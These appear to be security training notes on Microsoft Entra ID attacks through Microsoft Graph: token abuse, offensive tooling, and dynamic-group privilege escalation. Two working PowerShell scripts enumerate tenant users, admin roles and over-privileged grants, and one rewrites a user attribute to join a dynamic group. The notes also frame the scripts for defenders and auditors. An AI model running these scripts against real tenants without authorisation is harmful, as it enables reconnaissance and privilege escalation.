BAA 06 – Entra ID Enumeration
Microsoft Graph API
Microsoft Graph is the single REST endpoint (https://graph.microsoft.com) that provides programmatic access to Microsoft 365, Entra ID and related services: users, groups, mail, files, Teams channels, device configuration, application and role assignments. Developers use it to automate operations and integrate services; attackers use the same endpoint for reconnaissance, data theft and persistence by abusing over-privileged app registrations, stolen tokens or misconfigured permissions. Its reach across M365 data and Entra ID objects makes it a high-value target for data exfiltration, phishing sent from trusted mailboxes, and lateral movement into OneDrive, SharePoint or Azure. This section covers how Microsoft Graph is abused, the tools involved (Microsoft Graph PowerShell SDK, ROADrecon, GraphRunner, AzureHound, roadtx), and how attackers use them in practice.
How attackers are Utilizing Stolen Credentials or Tokens
Compromised credentials or tokens carrying Microsoft Graph scopes enable a range of malicious activity, bounded only by the scopes the token actually holds. Enumeration queries users, groups and devices (GET /v1.0/users) for User Principal Names (UPNs), roles and departments to use in targeted attacks. Data exfiltration pulls mail (GET /me/messages), OneDrive files (GET /me/drive/root/children) or Teams messages (GET /teams//channels). Persistence is obtained by registering new applications (POST /applications) with high-privilege scopes, or by adding a secret or certificate to an existing application or service principal (POST /applications/{id}/addPassword) so the attacker can mint their own tokens after the stolen one expires. Lateral movement uses tokens to pivot across services, for example reaching Azure resources through Graph-integrated roles, or exchanging a FOCI (Family of Client IDs) refresh token issued to one Microsoft first-party client for access tokens belonging to another client in the same family, reaching resources the original token was never scoped to. Attackers also grant consents or app role assignments to service principals they control, escalating from user-level to admin-level access.
Tools Used by Attackers
Microsoft Graph PowerShell SDK
Scriptable Graph API calls (Get-MgUser, Get-MgGroup, Get-MgServicePrincipal and the rest of the Microsoft.Graph module) that let an adversary holding a valid token enumerate users, groups, applications and permission grants at scale.
ROADrecon / ROADtools
Automates collection of Entra tenant metadata (users, groups, devices, service principals, applications, role and permission assignments) into a local SQLite database with a browser GUI, for fast mapping of over-privileged apps and relationships.
GraphRunner
Post-compromise PowerShell toolkit for token handling (refresh and FOCI exchange), mailbox, Teams and SharePoint enumeration, and automated checks against app scopes and service-principal configurations.
AzureHound
Collector that produces BloodHound-compatible datasets from Graph and Azure Resource Manager metadata, so that user -> app -> service-principal attack paths and lateral movement opportunities can be visualized as a graph.
ROADtx / PRT techniques
roadtx (the roadtools token exchange utility) and related techniques that work with Primary Refresh Tokens, device identities and refresh-token flows (including FOCI) to derive new access tokens for arbitrary resources without re-authenticating, enabling silent token exchanges across services.
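As an added example (not from the original page and not part of any of the tools listed above), the following Microsoft Graph PowerShell SDK script performs the enumeration described in the stolen-token section: it authenticates with an access token that is already in hand, lists users and directory-role members, and then reports every application permission granted on Microsoft Graph that appears on a hypothetical watch-list of dangerous scopes, plus delegated grants that were admin-consented for all users. It assumes the Microsoft.Graph module (v2 or later) and a token carrying at least Directory.Read.All; the cmdlet names are the SDK's own, the watch-list is an assumption.

```powershell
# Added example: tenant enumeration through the Microsoft Graph PowerShell SDK using an obtained token.
# Assumes Microsoft.Graph (v2+) is installed and the token carries at least Directory.Read.All.
Import-Module Microsoft.Graph.Authentication
Import-Module Microsoft.Graph.Users
Import-Module Microsoft.Graph.Identity.DirectoryManagement
Import-Module Microsoft.Graph.Identity.SignIns
Import-Module Microsoft.Graph.Applications

# Connect-MgGraph -AccessToken expects a SecureString in SDK v2; the token is pasted at runtime.
$secureToken = Read-Host -Prompt 'Graph access token' -AsSecureString
Connect-MgGraph -AccessToken $secureToken -NoWelcome

# Scopes the token actually carries: every query below is bounded by these.
$ctx = Get-MgContext
"Tenant: $($ctx.TenantId)  Account: $($ctx.Account)  Scopes: $($ctx.Scopes -join ', ')"

# 1. Users. Only a handful of properties come back by default, so request the ones that matter
#    for targeting (UPN, department, job title) and for dynamic-group analysis later.
$users = Get-MgUser -All -Property id,userPrincipalName,displayName,department,jobTitle,userType,accountEnabled
$users | Select-Object userPrincipalName, department, jobTitle, userType, accountEnabled | Format-Table -AutoSize

# 2. Directory role members: who holds Global Administrator, User Administrator and the rest.
#    Members are returned as generic directoryObjects, so the UPN lives in AdditionalProperties.
foreach ($role in Get-MgDirectoryRole -All) {
    foreach ($m in Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id -All) {
        $name = $m.AdditionalProperties['userPrincipalName']
        if (-not $name) { $name = $m.AdditionalProperties['displayName'] }   # service principals, groups
        [pscustomobject]@{ Role = $role.DisplayName; Member = $name; Type = $m.AdditionalProperties['@odata.type'] }
    }
}

# 3. Application permissions granted on Microsoft Graph. A single appRoleAssignedTo call on the
#    Graph service principal returns every assignment in the tenant, whichever app holds it.
$graphSp  = Get-MgServicePrincipal -Filter "appId eq '00000003-0000-0000-c000-000000000000'"
$roleName = @{}
foreach ($r in $graphSp.AppRoles) { $roleName[$r.Id] = $r.Value }   # appRole id -> e.g. Directory.ReadWrite.All

# Hypothetical watch-list (assumption): permissions that let an app rewrite users, roles, apps, groups or mail.
$dangerous = @(
    'Directory.ReadWrite.All', 'User.ReadWrite.All', 'RoleManagement.ReadWrite.Directory',
    'Application.ReadWrite.All', 'AppRoleAssignment.ReadWrite.All', 'Group.ReadWrite.All',
    'GroupMember.ReadWrite.All', 'Mail.ReadWrite', 'Mail.Send'
)

$grants = Get-MgServicePrincipalAppRoleAssignedTo -ServicePrincipalId $graphSp.Id -All
$overPrivileged = foreach ($g in $grants) {
    $perm = $roleName[$g.AppRoleId]
    if ($dangerous -contains $perm) {
        [pscustomobject]@{ Principal = $g.PrincipalDisplayName; PrincipalId = $g.PrincipalId; Permission = $perm }
    }
}
$overPrivileged | Sort-Object Principal, Permission | Format-Table -AutoSize

# 4. Delegated grants consented by an admin for all principals apply to every user who signs in
#    to that client, so a stolen token for such a client inherits the whole scope string.
Get-MgOauth2PermissionGrant -All |
    Where-Object { $_.ResourceId -eq $graphSp.Id -and $_.ConsentType -eq 'AllPrincipals' } |
    Select-Object ClientId, Scope
```

The same four queries are what a defender runs to find over-privileged service principals before an attacker does; step 3 in particular is cheap (one request) and its output is the input to the dynamic-group abuse discussed below, since any principal holding User.ReadWrite.All or Directory.ReadWrite.All can rewrite the attributes that membership rules evaluate.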
Dynamic Groups
Dynamic groups in Microsoft Entra ID automatically add or remove users and devices based on membership rules written as OData-style expressions over object attributes (for example user.department, device.deviceOSType or user.extensionAttribute1). This simplifies management, but it moves the trust boundary onto the attributes: whoever can write an attribute that a rule evaluates controls membership in the group. Roles such as Global Administrator and User Administrator can edit the user properties that rules rely on, and any application or service principal granted Directory.ReadWrite.All or User.ReadWrite.All can modify them programmatically through Graph (PATCH /users/{id}). Some attributes need no privilege at all: where the tenant allows users or guests to send invitations, the address written into a guest's otherMails is chosen by the inviter, so a rule such as user.otherMails -any (_ -contains "finance") can be satisfied by the invitee. By changing these values an attacker makes their account match the rule and is added automatically, usually within minutes, escalating access. Two caveats frame the impact. First, groups with dynamic membership cannot be role-assignable, so the prize is not a direct Entra role but whatever else the group has been granted: Azure RBAC roles, application roles, Conditional Access exclusions, Intune policies. Second, the rule must reference an attribute the attacker can actually write, so rules built on attributes owned by an authoritative sync are far harder to abuse than rules on free-form fields like department or otherMails.
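As an added example (not from the original page or the articles it cites), the script below uses the Microsoft Graph PowerShell SDK to enumerate every dynamic group and its membership rule, extract the attributes each rule depends on, list what the group has been granted through app role assignments, and then performs the attribute change an attacker holding User.ReadWrite.All would make to satisfy a department-based rule. It assumes an existing Connect-MgGraph session; the account name, the department value and the regex used to pull attribute names out of rules are assumptions, not anything the page states.

```powershell
# Added example: dynamic-group rule abuse, attacker and auditor view. Assumes Connect-MgGraph has
# already been called with a token that has Group.Read.All and (for step 3) User.ReadWrite.All.
Import-Module Microsoft.Graph.Groups
Import-Module Microsoft.Graph.Users

# 1. All groups with dynamic membership. membershipRule is only returned when requested explicitly.
$dynamicGroups = Get-MgGroup -All -Filter "groupTypes/any(c:c eq 'DynamicMembership')" `
    -Property id,displayName,membershipRule,membershipRuleProcessingState,isAssignableToRole,securityEnabled

# 2. Which attributes each rule evaluates (user.department, user.otherMails, device.deviceOSType ...).
#    Free-form user attributes are writable with User.ReadWrite.All; otherMails of a guest is set by the inviter.
$attributePattern = '(?:user|device)\.[A-Za-z0-9_]+'   # assumption: simple token match is enough for triage
$report = foreach ($g in $dynamicGroups) {
    $attrs = [regex]::Matches([string]$g.MembershipRule, $attributePattern) |
        ForEach-Object { $_.Value } | Sort-Object -Unique
    # What membership buys, as far as Graph shows it: app role assignments held by the group.
    # Azure RBAC roles, Conditional Access exclusions and Intune policies are not on the group object
    # and must be checked in ARM, Conditional Access and Intune respectively.
    $appRoles = Get-MgGroupAppRoleAssignment -GroupId $g.Id -All |
        Select-Object -ExpandProperty ResourceDisplayName -Unique
    [pscustomobject]@{
        Group            = $g.DisplayName
        Processing       = $g.MembershipRuleProcessingState   # 'On' means the rule is live
        Attributes       = ($attrs -join ', ')
        AppRoleResources = ($appRoles -join ', ')
        RoleAssignable   = $g.IsAssignableToRole               # always $false for dynamic groups
        Rule             = $g.MembershipRule
    }
}
$report | Format-Table Group, Processing, Attributes, AppRoleResources -AutoSize

# 3. The attacker's move against a rule such as (user.department -eq "Finance"): rewrite the attribute
#    on the account they control. This is a PATCH /users/{id} and lands in the audit log as "Update user".
$target = 'attacker@contoso.example'     # placeholder: the attacker-controlled account
Update-MgUser -UserId $target -Department 'Finance'

# 4. Rule processing is asynchronous (minutes, not seconds). Re-check membership afterwards.
$financeGroup = $dynamicGroups | Where-Object { $_.MembershipRule -match 'user\.department' } | Select-Object -First 1
if ($financeGroup) {
    $member = Get-MgGroupMember -GroupId $financeGroup.Id -All |
        Where-Object { $_.AdditionalProperties['userPrincipalName'] -eq $target }
    if ($member) { "$target is now a member of $($financeGroup.DisplayName)" }
    else         { "$target not yet a member of $($financeGroup.DisplayName); rule still processing or not matched" }
}
```

For a defender, step 2 is the useful part: any rule whose Attributes column lists a free-form field (department, jobTitle, otherMails, extensionAttributeN) together with a non-empty AppRoleResources column, or a group that also appears in Azure RBAC or Conditional Access exclusions, is a privilege escalation path for every principal that holds User.ReadWrite.All or Directory.ReadWrite.All, and the "Update user" audit events on those attributes are the detection signal.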
Additional Reading:
- https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/
- https://secfortress.com/hacking/intro_to_azure_recon_with_bloodhound/
- https://medium.com/r3d-buck3t/abusing-dynamic-groups-in-azuread-part-1-ff12e328c8c0
- https://medium.com/@AlbertGlenn/abuse-dynamic-groups-in-entra-id-for-privilege-escalation-292652f8f49b
